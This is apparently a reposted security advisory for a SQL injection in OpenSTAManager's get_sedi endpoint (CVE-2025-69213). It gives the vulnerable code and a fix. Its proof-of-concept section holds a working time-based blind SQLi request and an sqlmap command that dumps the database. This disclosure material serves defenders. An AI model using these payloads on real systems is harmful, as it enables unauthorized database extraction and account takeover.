Share
## https://sploitus.com/exploit?id=PACKETSTORM:218749
# CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | [CVE-2025-69213](https://nvd.nist.gov/vuln/detail/CVE-2025-69213) |
    | **Severity** | HIGH |
    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg) |
    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
    
    ## Affected Products
    
    - **devcode-it/openstamanager** (versions: <= 2.9.8)
    
    
    ## CWE Classification
    
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    
    ## Details
    
    ## Summary
    A SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.
    
    
    ## Proof of Concept
    
    ### Vulnerable Code
    **File:** `modules/anagrafiche/ajax/complete.php:28`
    
    ```php
    case 'get_sedi':
        $idanagrafica = get('idanagrafica');
        $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
              FROM an_sedi 
              WHERE idanagrafica='".$idanagrafica."' ...";
        $rs = $dbo->fetchArray($q);
    ```
    
    ### Data Flow
    1. **Source:** `$_GET['idanagrafica']` โ†’ `get('idanagrafica')`
    2. **Vulnerable:** User input concatenated directly into SQL query with single quotes
    3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query
    
    ### Exploit
    
    **Manual PoC (Time-based Blind SQLi):**
    ```http
    GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
    Host: localhost:8081
    Cookie: PHPSESSID=<valid-session>
    ```
    <img width="1304" height="580" alt="image" src="https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8" />
    
    **SQLMap Exploitation:**
    ```bash
    sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
      --cookie="PHPSESSID=<session>" \
      --dbms=MySQL \
      --technique=T \
      --level=3 \
      --dump
    ```
    
    **SQLMap Output:**
    ```
    [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
    Parameter: #1* (URI)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
    back-end DBMS: MySQL >= 5.0.12
    ```
    
    <img width="1284" height="745" alt="image" src="https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759" />
    
    
    ## Impact
    - **Data Exfiltration:** Complete database extraction including user credentials, customer data, financial records
    - **Privilege Escalation:** Modification of `zz_users` table to gain admin access
    - **Data Integrity:** Unauthorized modification or deletion of records
    - **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow
    
    ## Affected Versions
    - OpenSTAManager: Verified in latest version (as of December 2025)
    - All versions using this endpoint are likely affected
    
    ## Remediation
    
    Replace direct concatenation with prepared statements:
    
    **Before:**
    ```php
    $idanagrafica = get('idanagrafica');
    $q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
    ```
    
    **After:**
    ```php
    $idanagrafica = get('idanagrafica');
    $q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
    ```
    
    ## References
    - OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command
    
    ## Credit
    Discovered by: ลukasz Rybak
    
    ## References
    
    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69213
    - https://github.com/advisories/GHSA-w995-ff8h-rppg
    
    
    ## Disclaimer
    
    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.